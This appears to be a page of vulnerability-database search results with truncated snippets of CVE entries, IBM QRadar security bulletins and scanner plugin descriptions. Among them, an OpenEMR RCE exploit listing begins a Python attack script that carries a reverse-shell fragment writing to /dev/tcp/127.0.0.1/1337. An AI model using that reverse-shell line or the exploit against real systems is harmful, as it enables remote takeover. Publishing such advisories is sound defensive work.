CVE-2019-4454

CVE-2019-4454 affects IBM QRadar SIEM versions 7.3.0–7.3.2 Patch 4. The vulnerability is a cross-site scripting (XSS) issue in the Web UI that can allow an attacker to embed arbitrary JavaScript, potentially leading to credentials disclosure within a trusted session. Affected product/component: I...

Zimbra Collaboration Suite ProxyServlet Server Side Request Forgery

Added: 06/06/2019 CVE: CVE-2019-9621 Background Zimbra Collaboration Suite is an email, calendar, and collaboration solution for enterprises. Problem The ProxyServlet component allows a remote attacker to upload arbitrary files, which can then be executed, using XML External Entity injection and...

Security Bulletin: IBM QRadar SIEM is vulnerable to OS Command Injection (CVE-2018-1571) (Updated 9/12/2018)

Summary User-supplied data may be passed to a system shell. Attackers could execute arbitrary commands on the system. Vulnerability Details CVEID: CVE-2018-1571 Description: IBM QRadar could allow a remote authenticated attacker to execute arbitrary commands on the system. By sending a...

Episerver 7 Patch 4 XML Injection

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 1...

Security Bulletin: IBM QRadar SIEM has released 7.3.1 Patch 4, and 7.2.8 Patch 13 in response to the vulnerabilities known as Spectre and Meltdown.

Summary IBM has released the following 7.3.1 Patch 4, and 7.2.8 Patch 13 for IBM QRadar SIEM in response to CVE-2017-5753, CVE-2017-5715 and CVE-2017-5754 Vulnerability Details CVEID: CVE-2017-5753 CVEID: CVE-2017-5715 CVEID: CVE-2017-5754 Affected Products and Versions IBM QRadar SIEM 7.3.0 –...

OpenEMR < 5.0.1 - Remote Code Execution

Title: OpenEMR & /dev/tcp/127.0.0.1/1337 0&1' ''' !/usr/bin/env python import argparse import base64 import requests import sys ap = argparse.ArgumentParserdescription="OpenEMR RCE" ap.addargument"host", help="Path to OpenEMR Example: http://127.0.0.1/openemr." ap.addargument"-u", "--user",...

Security Bulletin: Open Source XStream as used in IBM QRadar SIEM is vulnerable to Denial of Service. (CVE-2017-7957)

Summary Open Source XStream is vulnerable to a Denial of Service attack. Vulnerability Details CVEID: CVE-2017-7957 DESCRIPTION: XStream is vulnerable to a denial of service, caused by the improper handling of attempts to create an instance of the primitive type 'void' during unmarshalling. A...

Security Bulletin: IBM QRadar Incident Forensics is vulnerable to overly permissive CORS access policies (CVE-2016-9725)

Summary IBM QRadar Incident Forensics is affected by Cross-Origin Resource Sharing CORS which is a mechanism that allows web sites to request resources from external sites, avoiding the need to duplicate them. Vulnerability Details CVEID: CVE-2016-9725 DESCRIPTION: IBM QRadar Incident Forensics...

Security Bulletin: IBM QRadar SIEM and QRadar Incident Forensics are vulnerable to information exposure (CVE-2016-9720)

Summary IBM QRadar SIEM and Incident Forensics discloses sensitive information to unauthorized users. The information can be used to mount further attacks on the system. Vulnerability Details CVEID: CVE-2016-9720 DESCRIPTION: IBM QRadar discloses sensitive information to unauthorized users. The...

Security Bulletin: Apache Tomcat as used in IBM QRadar SIEM is vulnerable to various CVE's

Summary Apache Tomcat prior to version 6.0.48 is susceptible to several vulnerabilities. Vulnerability Details CVEID: CVE-2016-0762 DESCRIPTION: Apache Tomcat could allow a remote attacker to obtain sensitive information, caused by the failure to process the user supplied password if the specifie...

Security Bulletin: IBM Java as used in IBM QRadar SIEM and Incident Forensics is vulnerable to various CVE's

Summary IBM QRadar SIEM and Incident Forensics are vulnerabile to various CVE's found in IBM Java. Vulnerability Details CVEID: CVE-2016-5597 DESCRIPTION: An unspecified vulnerability in Oracle Java SE and Java SE Embedded related to the Networking component could allow a remote attacker to obtai...

Security Bulletin: Pivotal Spring Framework as used in IBM QRadar SIEM is vulnerable to various CVE's

Summary OpenSource Pivotal Spring Framework as used in IBM QRadar is susceptible to several vulnerabilities. Vulnerability Details CVEID: CVE-2013-7315 DESCRIPTION: Pivotal Spring Framework could allow a remote attacker to obtain sensitive information, caused by an XML External Entity Injection X...

HP ArcSight ESM 6.x < 6.9.1.2377.4 / 6.11.0.2385.1 Multiple Vulnerabilities

According to its self-reported version number, the version of HP ArcSight Enterprise Security Manager ESM installed on the remote host is 6.x prior to 6.9.1c Patch 4 or 6.11.0 Patch 1. It is, therefore, affected by multiple vulnerabilities. See advisory for details. C Tenable Network Security, In...

CVE-2017-13991

An information leakage vulnerability in ArcSight ESM and ArcSight ESM Express, any 6.x version prior to 6.9.1c Patch 4 or 6.11.0 Patch 1, allows disclosure of product license features...

Cross site scripting

A reflected Cross-Site ScriptingXSS vulnerability in ArcSight ESM and ArcSight ESM Express, any 6.x version prior to 6.9.1c Patch 4 or 6.11.0 Patch 1, allows for unintended information when a specific URL is sent to the system...

HPE LoadRunner 'libxdrutil.dll mxdr_string method' RCE Vulnerability

HPE LoadRunner is prone to a remote code execution RCE vulnerability. SPDX-FileCopyrightText: 2017 Greenbone AG Some text descriptions might be excerpted from a referenced sources, and are Copyright C by the respective right holders. SPDX-License-Identifier: GPL-2.0-only CPE =...

HPE LoadRunner < 12.53 Patch 4 libxdrutil.dll mxdr_string() RCE

The version of HP LoadRunner installed on the remote Windows host is prior to 12.53 patch 4. It is, therefore, affected by a remote code execution vulnerability due to a heap-based buffer overflow condition in the mxdrstring function in libxdrutil.dll. An unauthenticated, remote attacker can...

HP Performance Center < 12.53 Patch 4 libxdrutil.dll mxdr_string() RCE

The version of HP Performance Center installed on the remote Windows host is prior to 12.53 Patch 4. It is, therefore, affected by a remote code execution vulnerability due to a heap-based buffer overflow condition in the mxdrstring function in libxdrutil.dll. An unauthenticated, remote attacker...

CVE-2016-2789

Cross-site scripting XSS vulnerability in the Web User Interface in Citrix XenMobile Server 10.0, 10.1 before Rolling Patch 4, and 10.3 before Rolling Patch 1 allows remote attackers to inject arbitrary web script or HTML via unspecified vectors...

CVE-2015-5968

Cross-site scripting XSS vulnerability in Novell Filr 1.2 before Hot Patch 4 allows remote attackers to inject arbitrary web script or HTML via a crafted URL...